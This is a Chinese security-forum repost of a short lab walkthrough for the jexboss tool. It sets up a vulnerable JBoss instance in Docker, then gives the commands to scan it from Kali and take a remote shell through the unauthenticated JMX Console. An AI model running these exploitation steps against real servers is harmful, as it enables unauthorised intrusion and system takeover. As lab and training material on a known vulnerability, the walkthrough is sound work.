设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 jexboss工具 -- JBOSS未授权访问漏洞利用
返回列表 发新帖
查看: 5979|回复: 0

jexboss工具 -- JBOSS未授权访问漏洞利用

[复制链接]
gclome

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-12-18 17:14:43 | 显示全部楼层 |阅读模式
原文链接:jexboss工具 -- JBOSS未授权访问漏洞利用

jexboss工具 -- JBOSS未授权访问漏洞利用
web安全工具库 昨天
其实所有的节日,都不是为了礼物和红包而生,而是提醒我们不要忘记爱与被爱,生活需要仪式感,而你需要的是在乎和关爱。。。
----  网易云热评
小受:Ubuntu20
小攻:Kali2020

一、搭建该漏洞环境
查看上一篇文章:
Ubuntu20安装docker并部署相关漏洞环境

二、访问http://192.168.77.136:8080/进入后台,点击JMX Console


三、漏洞利用工具
1、下载地址:https://github.com/joaomatosf/jexboss
2、cd jexboss
3、python3 jexboss.py会弹出该工具使用方法

4、python3 jexboss.py -u 192.168.77.136:8080
有红色vulnerable,说明存在漏洞

5、输入yes,获取shell,上面我们已看到Ubuntu的相关信息


禁止非法,后果自负
欢迎关注公众号:web安全工具库


回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-20 19:34 , Processed in 0.013902 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表